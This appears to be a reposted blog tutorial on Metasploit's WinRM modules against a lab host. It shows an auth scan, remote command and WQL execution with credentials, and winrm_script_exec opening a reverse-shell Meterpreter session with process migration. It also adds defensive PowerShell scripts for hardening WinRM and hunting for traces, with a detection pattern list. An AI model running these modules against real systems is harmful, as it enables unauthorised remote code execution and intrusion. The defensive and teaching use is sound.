metasploit - winrm
Source: Internet | Published: IELTS books / Zhihu | Editor: 程序博客网 | Time: 2024/05/19 11:37
```
msf auxiliary(winrm_auth_methods) > show options

Module options (auxiliary/scanner/winrm/winrm_auth_methods):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DOMAIN   WORKSTATION      yes       The domain to use for Windows authentification
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.1.103    yes       The target address range or CIDR identifier
   RPORT    5985             yes       The target port
   THREADS  1                yes       The number of concurrent threads
   URI      /wsman           yes       The URI of the WinRM service
   VHOST                     no        HTTP server virtual host

msf auxiliary(winrm_auth_methods) > run

[+] 192.168.1.103:5985: Negotiate protocol supported
[+] 192.168.1.103:5985: Basic protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
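The scan above reports that the host advertises Basic authentication on its HTTP (5985) listener. With Basic over HTTP the credentials travel base64-encoded in the Authorization header and, unless the server refuses unencrypted traffic, the SOAP bodies cross the wire in cleartext; Negotiate (Kerberos/NTLM) at least encrypts the WinRM payload. The following script is an added example, not part of the original post and not Metasploit code: it audits the settings behind that finding on the Windows host itself and can remediate the two that are safe to flip. It assumes an elevated PowerShell session on the audited host with the WinRM service running (the `WSMan:` drive needs it); `Get-LocalGroupMember` exists only on PowerShell 5.1 and newer, so that check is skipped silently elsewhere.

```powershell
# Added example (not from the page or from Metasploit): audit the WinRM service
# settings that let a scan like winrm_auth_methods report "Basic protocol supported"
# on an HTTP listener, and optionally remediate. Run elevated on the host itself.
param(
    [switch]$Fix   # when set, disable Basic auth and unencrypted transport
)

$findings = New-Object System.Collections.Generic.List[string]

# Basic auth: base64 credentials in the Authorization header, no message-level
# encryption. Only defensible behind an HTTPS listener, and rarely needed at all.
$basic = (Get-Item WSMan:\localhost\Service\Auth\Basic).Value
if ($basic -eq 'true') {
    $findings.Add('Service\Auth\Basic is enabled')
    if ($Fix) { Set-Item WSMan:\localhost\Service\Auth\Basic -Value $false }
}

# AllowUnencrypted: permits cleartext SOAP bodies when the auth scheme supplies no
# encryption of its own (i.e. Basic over HTTP).
$unenc = (Get-Item WSMan:\localhost\Service\AllowUnencrypted).Value
if ($unenc -eq 'true') {
    $findings.Add('Service\AllowUnencrypted is enabled')
    if ($Fix) { Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $false }
}

# Listeners: report every HTTP listener and whether an HTTPS one exists. Negotiate
# still encrypts the payload over HTTP, but HTTPS with a trusted certificate is the
# stronger baseline. Listeners are not changed automatically.
$listeners = Get-WSManInstance -ResourceURI winrm/config/listener -Enumerate
$hasHttps  = $false
foreach ($l in $listeners) {
    if ($l.Transport -eq 'HTTP')  { $findings.Add("HTTP listener on $($l.Address):$($l.Port)") }
    if ($l.Transport -eq 'HTTPS') { $hasHttps = $true }
}
if (-not $hasHttps) { $findings.Add('No HTTPS listener configured') }

# Who may open a WinRM shell: local Administrators plus this group. Worth reviewing,
# because a valid account in either is all the winrm_cmd module needs.
$members = Get-LocalGroupMember -Group 'Remote Management Users' -ErrorAction SilentlyContinue
foreach ($m in $members) { $findings.Add("Remote Management Users member: $($m.Name)") }

if ($findings.Count -eq 0) {
    Write-Output 'WinRM service configuration: no findings'
} else {
    Write-Output 'WinRM service configuration findings:'
    $findings | ForEach-Object { Write-Output "  - $_" }
    if ($Fix) {
        Write-Output 'Disabled Basic auth and unencrypted transport; listeners and group membership still need a manual decision.'
    }
}
```

Run it once without `-Fix` to see the report, then with `-Fix` after confirming nothing legitimate still relies on Basic auth (a non-domain client that authenticates by local account over HTTPS is the usual holdout). The values read from the `WSMan:` drive are the strings `true`/`false`, which is why the comparisons are against strings.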
```
msf auxiliary(winrm_cmd) > show options

Module options (auxiliary/scanner/winrm/winrm_cmd):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CMD          whoami           yes       The windows command to run
   DOMAIN       WORKSTATION      yes       The domain to use for Windows authentification
   PASSWORD     password         yes       The password to authenticate with
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.1.103    yes       The target address range or CIDR identifier
   RPORT        5985             yes       The target port
   SAVE_OUTPUT  false            yes       Store output as loot
   THREADS      1                yes       The number of concurrent threads
   URI          /wsman           yes       The URI of the WinRM service
   USERNAME     lab              yes       The username to authenticate as
   VHOST                         no        HTTP server virtual host

msf auxiliary(winrm_cmd) > run

[+] sec\lab
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
```
msf auxiliary(winrm_wql) > show options

Module options (auxiliary/scanner/winrm/winrm_wql):

   Name       Current Setting                        Required  Description
   ----       ---------------                        --------  -----------
   DOMAIN     WORKSTATION                            yes       The domain to use for Windows authentification
   NAMESPACE  /root/cimv2/                           yes       The WMI namespace to use for queries
   PASSWORD   password                               yes       The password to authenticate with
   Proxies                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.103                          yes       The target address range or CIDR identifier
   RPORT      5985                                   yes       The target port
   THREADS    1                                      yes       The number of concurrent threads
   URI        /wsman                                 yes       The URI of the WinRM service
   USERNAME   lab                                    yes       The username to authenticate as
   VHOST                                             no        HTTP server virtual host
   WQL        Select Name,Status from Win32_Service  yes       The WQL query to run

msf auxiliary(winrm_wql) > run

[+] Select Name,Status from Win32_Service (192.168.1.103)
=====================================================

 Name         Status
 ----         ------
 ALG          OK
 AeLookupSvc  OK
 AppIDSvc     OK
 AppMgmt      OK
 ......       ......
```
```
msf exploit(winrm_script_exec) > show options

Module options (exploit/windows/winrm/winrm_script_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     WORKSTATION      yes       The domain to use for Windows authentification
   FORCE_VBS  false            yes       Force the module to use the VBS CmdStager
   PASSWORD   password         yes       A specific password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.103    yes       The target address
   RPORT      5985             yes       The target port
   URI        /wsman           yes       The URI of the WinRM service
   USERNAME   lab              yes       A specific username to authenticate as
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Windows

msf exploit(winrm_script_exec) > run

[*] Started reverse TCP handler on 192.168.1.102:4444
[*] checking for Powershell 2.0
[-] You selected an x86 payload for an x64 target...trying to run in compat mode
[*] Attempting to set Execution Policy
[+] Set Execution Policy Successfully
[*] Grabbing %TEMP%
[*] Uploading powershell script to C:\Users\lab\AppData\Local\Temp\XcemuUGC.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Sending stage (957487 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:49514) at 2015-12-26 15:37:13 +0800

meterpreter > 
[*] Session ID 1 (192.168.1.102:4444 -> 192.168.1.103:49514) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: powershell.exe (1836)
[*] Attempting to move into explorer.exe for current user...
[+] Migrating to 2844
[+] Successfully migrated to process 2844
meterpreter > sysinfo
Computer        : SEC
OS              : Windows 7 (Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/win64
```
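Every step of the run above leaves something on the target: a WSMan shell is created on the server, a .ps1 is written to the user's %TEMP% and executed by powershell.exe under a WinRM host process, and the execution policy is changed in that process. The script below is an added example, not part of the original post and not Rapid7 or Metasploit code, showing how a responder would look for those traces on the host afterwards. It assumes an elevated session on the examined host, that the Microsoft-Windows-WinRM/Operational log is enabled (Event ID 91 is written when a WSMan shell is created on the server, which also covers the winrm_cmd run earlier on this page) and that PowerShell script block logging is on (Microsoft-Windows-PowerShell/Operational, Event ID 4104, which captures the uploaded script's text in full; PowerShell 2.0, the version the module probes for, has no such logging). The pattern list is a constructed starting point, not a complete signature set. Note that the session migrated out of powershell.exe into explorer.exe, so the live-process check only helps before migration; the log queries are what persist.

```powershell
# Added example (not from the page, Metasploit or Rapid7): hunt for traces of remote
# PowerShell execution over WinRM on this host. Run elevated. Assumes the WinRM
# operational log and PowerShell script block logging are both enabled.
param(
    [int]$Hours = 24,
    # Constructed starting patterns: execution-policy changes, decoding, in-memory
    # evaluation, use of the temp directory and raw sockets. Crude by design.
    [string[]]$Patterns = @('Set-ExecutionPolicy', 'FromBase64String', 'Invoke-Expression',
                            'IEX', '$env:TEMP', 'System.Net.Sockets.TCPClient')
)
$since = (Get-Date).AddHours(-$Hours)
$regex = ($Patterns | ForEach-Object { [regex]::Escape($_) }) -join '|'

# 1. WSMan shells created on this host in the window. Event ID 91 in the WinRM
#    operational log; the first message line names the resource URI, the event's
#    user field names the account that authenticated.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-WinRM/Operational'; Id = 91; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        [pscustomobject]@{
            Time   = $_.TimeCreated
            Source = 'WinRM shell created'
            Detail = "user=$($_.UserId); $(($_.Message -split "`r?`n")[0])"
        }
    }

# 2. Script blocks whose text matches the patterns. For a 4104 event the property
#    order is MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path, so
#    index 2 is the script text and index 4 the file it was loaded from (if any).
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $evt  = $_
        $text = [string]$evt.Properties[2].Value
        $hits = [regex]::Matches($text, $regex, 'IgnoreCase') | ForEach-Object { $_.Value } | Sort-Object -Unique
        if ($hits) {
            [pscustomobject]@{
                Time   = $evt.TimeCreated
                Source = 'Script block'
                Detail = "matched [$($hits -join ', ')]; path=$($evt.Properties[4].Value)"
            }
        }
    }

# 3. Live processes: powershell.exe whose parent is a WinRM host process.
#    wsmprovhost.exe hosts PowerShell remoting; winrshost.exe hosts WinRM cmd shells.
#    Only useful while the payload still lives in powershell.exe (i.e. before migration).
$winrmHosts = @('wsmprovhost.exe', 'winrshost.exe')
Get-CimInstance Win32_Process -Filter "Name='powershell.exe'" | ForEach-Object {
    $proc   = $_
    $parent = Get-CimInstance Win32_Process -Filter "ProcessId=$($proc.ParentProcessId)"
    if ($parent -and $winrmHosts -contains $parent.Name) {
        [pscustomobject]@{
            Time   = $proc.CreationDate
            Source = 'Live process'
            Detail = "powershell.exe PID $($proc.ProcessId) spawned by $($parent.Name) PID $($parent.ProcessId); cmdline=$($proc.CommandLine)"
        }
    }
}
```

The three sections emit uniform objects, so the output can be piped to `Sort-Object Time` or `Export-Csv` as-is. If script block logging was not on at the time, section 2 returns nothing; the policy key that enables it is `HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging` with `EnableScriptBlockLogging` set to 1, and it only takes effect for PowerShell 5 and later.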
References
- https://social.technet.microsoft.com/Forums/windowsserver/en-US/e5f8cfee-d4a6-4e5c-9baf-e8a8a67d9316/winrm-access-denied
- https://community.rapid7.com/community/metasploit/blog/2012/11/08/abusing-windows-remote-management-winrm-with-metasploit
- http://blogs.technet.com/b/jonjor/archive/2009/01/09/winrm-windows-remote-management-troubleshooting.aspx
- http://pubs.vmware.com/orchestrator-plugins/index.jsp?topic=%2Fcom.vmware.using.powershell.plugin.doc_10%2FGUID-D4ACA4EF-D018-448A-866A-DECDDA5CC3C1.html